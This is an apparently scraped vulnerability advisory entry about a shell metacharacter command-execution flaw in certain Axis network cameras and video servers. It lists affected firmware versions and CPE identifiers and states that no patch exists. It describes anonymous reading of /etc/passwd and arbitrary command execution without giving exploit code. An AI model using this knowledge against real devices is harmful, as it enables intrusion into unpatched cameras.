vendor:
Axis Network Cameras and Video Servers
by:
7.5
CVSS
HIGH
Shell Metacharacter Command-Execution
CWE
Product Name: Axis Network Cameras and Video Servers
Affected Version From: Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.34 thru 2.40, Axis 2130 network cameras, Axis 2401 and 2401 video servers
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: axis:2100_firmware:2.34, axis:2100_firmware:2.35, axis:2100_firmware:2.36, axis:2100_firmware:2.37, axis:2100_firmware:2.38, axis:2100_firmware:2.39, axis:2100_firmware:2.40, axis:2110_firmware:2.34, axis:2110_firmware:2.35, axis:2110_firmware:2.36, axis:2110_firmware:2.37, axis:2110_firmware:2.38, axis:2110_firmware:2.39, axis:2110_firmware:2.40, axis:2120_firmware:2.34, axis:2120_firmware:2.35, axis:2120_firmware:2.36, axis:2120_firmware:2.37, axis:2120_firmware:2.38, axis:2120_firmware:2.39, axis:2120_firmware:2.40, axis:2420_firmware:2.34, axis:2420_firmware:2.35, axis:2420_firmware:2.36, axis:2420_firmware:2.37, axis:2420_firmware:2.38, axis:2420_firmware:2.39, axis:2420_firmware:2.40, axis:2130, axis:2401, axis:2401_video_server
Platforms Tested:
Shell Metacharacter Command-Execution Vulnerability in Axis Network Cameras and Video Servers
An anonymous user can exploit this vulnerability to download the contents of the '/etc/passwd' file on the device. Other commands can also be executed, enabling further attacks.
